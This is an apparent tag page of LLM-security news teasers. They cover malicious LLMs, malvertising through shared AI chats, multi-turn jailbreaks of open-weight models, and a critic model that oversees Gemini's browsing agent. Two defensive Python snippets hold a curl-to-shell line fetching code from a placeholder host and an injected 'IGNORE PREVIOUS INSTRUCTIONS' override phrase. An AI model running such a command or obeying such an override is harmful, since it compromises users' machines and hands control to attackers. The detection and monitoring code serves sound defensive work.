Tag: LLM
-
Securing the AI Revolution: NSFOCUS LLM Security Protection Solution
As Artificial Intelligence technology rapidly advances, Large Language Models (LLMs) are being widely adopted across countless domains. However, with this growth comes a critical challenge: LLM security issues are becoming increasingly prominent, posing a major constraint on further development. Governments and regulatory bodies are responding with policies and regulations to ensure safety and compliance…
-
NDSS 2025 IsolateGPT: An Execution Isolation Architecture For LLM-Based Agentic Systems
Session 6A: LLM Privacy and Usable Privacy Authors, Creators & Presenters: Yuhao Wu (Washington University in St. Louis), Franziska Roesner (University of Washington), Tadayoshi Kohno (University of Washington), Ning Zhang (Washington University in St. Louis), Umar Iqbal (Washington University in St. Louis) PAPER IsolateGPT: An Execution Isolation Architecture for LLM-Based Agentic Systems Large language models…
-
LLM-Driven Automation: A New Catalyst for Ransomware and RaaS Ecosystems
SentinelLABS has released a comprehensive assessment regarding the integration of Large Language Models (LLMs) into the ransomware ecosystem, concluding that while AI is not yet driving a fundamental transformation in tactics, it is significantly accelerating the operational lifecycle. The research indicates that measurable gains in speed, volume, and multilingual reach are reshaping the threat landscape,…
-
Demystifying risk in AI
Tags: access, ai, best-practice, bsi, business, ciso, cloud, compliance, control, corporate, csf, cyber, cybersecurity, data, framework, google, governance, group, infrastructure, intelligence, ISO-27001, LLM, mitre, ml, monitoring, nist, PCI, risk, risk-management, strategy, technology, threat, training, vulnerability
The data inserted in a request, the model and architecture that evaluate that data, and the result that is ultimately delivered: from an information security point of view, these are the points that we, as information security professionals, must judge in the scope of evaluation from the perspective of…
-
NDSS 2025 Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report
Session 6A: LLM Privacy and Usable Privacy Authors, Creators & Presenters: Xiaoyuan Wu (Carnegie Mellon University), Lydia Hu (Carnegie Mellon University), Eric Zeng (Carnegie Mellon University), Hana Habib (Carnegie Mellon University), Lujo Bauer (Carnegie Mellon University) PAPER Transparency or Information Overload? Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report Apple’s App Privacy…
-
Security for AI: How Shadow AI, Platform Risks, and Data Leakage Leave Your Organization Exposed
Tags: access, ai, attack, awareness, business, chatgpt, china, cloud, compliance, control, corporate, cybersecurity, data, data-breach, defense, detection, endpoint, governance, guide, infrastructure, injection, leak, LLM, malicious, microsoft, mitigation, monitoring, network, open-source, openai, privacy, RedTeam, risk, saas, service, strategy, threat, tool, training, vulnerability
Your employees are using AI whether you’ve sanctioned it or not. And even if you’ve carefully vetted and approved an enterprise-grade AI platform, you’re still at risk of attacks and data leakage. Key takeaways: Security teams face three key risks as AI usage becomes widespread at work: Shadow AI, the challenge of safely sanctioning tools,…
-
Hackers Are Using Shared AI Chats to Steal Your Passwords and Crypto
A sophisticated malvertising campaign is exploiting ChatGPT and DeepSeek’s shared chat features to deliver credential-stealing malware to macOS users. Threat actors are purchasing sponsored Google search results and redirecting victims to legitimate-looking LLM-generated chat sessions that contain obfuscated malicious commands, effectively bypassing platform-level safety mechanisms. The attack begins when users search for common macOS troubleshooting…
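The obfuscated commands described above typically decode a hidden payload and pipe it straight into a shell. A minimal, hypothetical detection heuristic (not from the reported campaign, just an illustration of the pattern) could flag exactly that shape:

```python
import base64
import re

# Hypothetical heuristic: flag one-liners that decode base64 data and pipe
# the result into an interpreter -- the shape reported in these campaigns.
SUSPICIOUS_SINKS = ("bash", "sh", "zsh", "osascript", "python")

def looks_like_obfuscated_dropper(command: str) -> bool:
    """Return True if a command decodes base64 and feeds the output to a shell."""
    decodes = re.search(r"base64\s+(-d|--decode|-D)", command) is not None
    pipes_to_sink = any(
        re.search(rf"\|\s*{sink}\b", command) for sink in SUSPICIOUS_SINKS
    )
    return decodes and pipes_to_sink

# A benign-looking "troubleshooting fix" hiding a curl-to-shell payload:
payload = base64.b64encode(b"curl -fsSL https://example.invalid/x | sh").decode()
print(looks_like_obfuscated_dropper(f"echo {payload} | base64 -d | bash"))  # True
print(looks_like_obfuscated_dropper("ls -la /tmp"))  # False
```

Real detections would need far more signals (encoded URLs, `osascript` abuse, clipboard staging), but the decode-then-execute pipe is the common denominator.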
-
LLM vulnerability patching skills remain limited
Security teams are wondering whether LLMs can help speed up patching. A new study tests that idea and shows where the tools hold up and where they fall short. The researchers … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/12/11/llms-software-vulnerability-patching-study/
-
APT28’s Toolkit: AI, Wi-Fi Intrusions, Cloud C2
APT28’s new “LameHug” malware uses LLMs to generate basic commands, a strikingly clumsy move from an otherwise advanced threat group. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/apt28s-toolkit-ai-wi-fi-intrusions-cloud-c2/
-
LLMs are everywhere in your stack and every layer brings new risk
LLMs are moving deeper into enterprise products and workflows, and that shift is creating new pressure on security leaders. A new guide from DryRun Security outlines how these … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/12/10/enterprise-llm-security-risks-analysis/
-
Gemini for Chrome gets a second AI agent to watch over it
Google’s two-model defense: To address these risks, the solution splits the work between two AI models. The main Gemini model reads web content and decides what actions to take. The user alignment critic sees only metadata about proposed actions, not the web content that might contain malicious instructions. “This component is architected to see only metadata…
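The split-responsibility pattern described above can be sketched in a few lines. All names here are hypothetical illustrations of the idea, not Google's actual API: the planner sees untrusted page content, while the critic is only ever handed action metadata, so injected page text never reaches the approval step.

```python
from dataclasses import dataclass

@dataclass
class ProposedAction:
    kind: str           # e.g. "click", "type", "navigate"
    target_domain: str  # metadata the critic is allowed to see
    raw_page_text: str  # untrusted content, visible only to the planner model

def critic_approves(action: ProposedAction, user_goal: str) -> bool:
    """Approve or veto based on metadata only -- never read raw_page_text."""
    metadata = {"kind": action.kind, "target_domain": action.target_domain}
    if metadata["kind"] == "navigate" and metadata["target_domain"] not in user_goal:
        return False  # navigating to a domain the user never asked about
    return True

# A prompt-injected page tries to redirect the agent; the critic never sees
# the injected text, only the suspicious navigation target, and vetoes it.
bad = ProposedAction("navigate", "evil.example", "IGNORE PREVIOUS INSTRUCTIONS...")
print(critic_approves(bad, "book a flight on airline.example"))  # False
```

The design choice is isolation by information flow: a rule (or second model) that cannot read the attacker-controlled channel cannot be steered by it.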
-
Malicious Models in the Underground: Unit 42 Shows a Growing Black Market for Dark LLMs
First seen on security-insider.de Jump to article: www.security-insider.de/unit-42-zeigt-wachsenden-schwarzmarkt-fuer-dark-llms-a-d2a5e7bd2dadf1936b14944af8c3670b/
-
Hacking as a Prompt: Malicious LLMs Find Users
WormGPT 4 Sells for $50 Monthly, While KawaiiGPT Goes Open Source. The cybercrime-as-a-service model has a new product line, with malicious large language models built without ethical guardrails selling on Telegram for $50 monthly. Other groups are taking the open-source route, distributing their models free on GitHub. First seen on govinfosecurity.com Jump to article: www.govinfosecurity.com/hacking-as-prompt-malicious-llms-find-users-a-30224
-
UK cyber agency warns LLMs will always be vulnerable to prompt injection
The comments echo many in the research community who have said the flaw is an inherent trait of generative AI technology. First seen on cyberscoop.com Jump to article: cyberscoop.com/uk-warns-ai-prompt-injection-unfixable-security-flaw/
-
How Agentic BAS AI Turns Threat Headlines Into Defense Strategies
Picus Security explains why relying on LLM-generated attack scripts is risky and how an agentic approach maps real threat intel to safe, validated TTPs. Their breakdown shows how teams can turn headline threats into reliable defense checks without unsafe automation. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/how-agentic-bas-ai-turns-threat-headlines-into-defense-strategies/
-
AI Creates New Security Risks for OT Networks
Security authorities see the growing use of AI as a threat to the security of OT systems. The security of operational technology (OT) in critical infrastructure has been a recurring topic for years. In the view of security organizations, the increased use of AI in OT could make the situation even worse. For this reason, the US cybersecurity agency CISA recently, together with…
-
LLM Security: Cisco Study Shows Multi-Turn Attacks Crack Open-Weight LLMs
First seen on security-insider.de Jump to article: www.security-insider.de/cisco-studie-multi-turn-angriffe-knacken-open-weight-llms-a-a206993ac451107393a3e25f98163544/
-
MIT Study: ChatGPT and LLM Use and Brain Activity
A study by the Massachusetts Institute of Technology (MIT) on how LLM use affects our brain activity was published in the summer and sparked debate. The result in one sentence: ChatGPT and its peers make the brain lazier and… First seen on borncity.com Jump to article: www.borncity.com/blog/2025/12/07/mit-studie-chatgpt-bzw-llm-nutzung-und-gehirn-aktivitaeten/
-
AI creates new security risks for OT networks, warns NSA
Tags: ai, cisa, compliance, control, cyber, data, data-breach, government, healthcare, infrastructure, injection, intelligence, LLM, network, risk, technology, training
Principles for the Secure Integration of Artificial Intelligence in Operational Technology, authored by the NSA in conjunction with the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) and a global alliance of national security agencies. While the use of AI in critical infrastructure OT is in its early days, the guidance reads like an attempt…
-
OAuth Isn’t Enough For Agents
OAuth is a broadly accepted standard. It’s used all over the internet. But as the usage of LLM agents continues to expand, OAuth isn’t going to be enough. In fact, relying on OAuth will be dangerous: we won’t be able to set permissions at an appropriate granularity, giving LLMs access to far too much.
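The granularity gap is easy to see in miniature. A minimal sketch, assuming a GitHub-style coarse `repo` scope (the field names and grant shape below are hypothetical, chosen for illustration):

```python
# A classic OAuth scope is all-or-nothing: "repo" authorizes every verb on
# every repository, saying nothing about which resource or which action.
coarse_token = {"scopes": {"repo"}}

# A hypothetical agent-aware grant narrows authority to one verb on one
# resource, for a short time window.
fine_grant = {
    "resource": "repos/acme/website",
    "actions": {"read"},
    "expires_in_s": 300,
}

def coarse_allows(token: dict, resource: str, action: str) -> bool:
    # The scope carries no resource or verb information at all.
    return "repo" in token["scopes"]

def fine_allows(grant: dict, resource: str, action: str) -> bool:
    return resource == grant["resource"] and action in grant["actions"]

# The coarse scope lets an agent delete any repo; the fine grant does not.
print(coarse_allows(coarse_token, "repos/acme/payroll", "delete"))  # True
print(fine_allows(fine_grant, "repos/acme/payroll", "delete"))      # False
print(fine_allows(fine_grant, "repos/acme/website", "read"))        # True
```

Standards work in this direction already exists (e.g. OAuth Rich Authorization Requests), but the point of the article stands: scope strings alone cannot express per-task, per-resource agent permissions.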

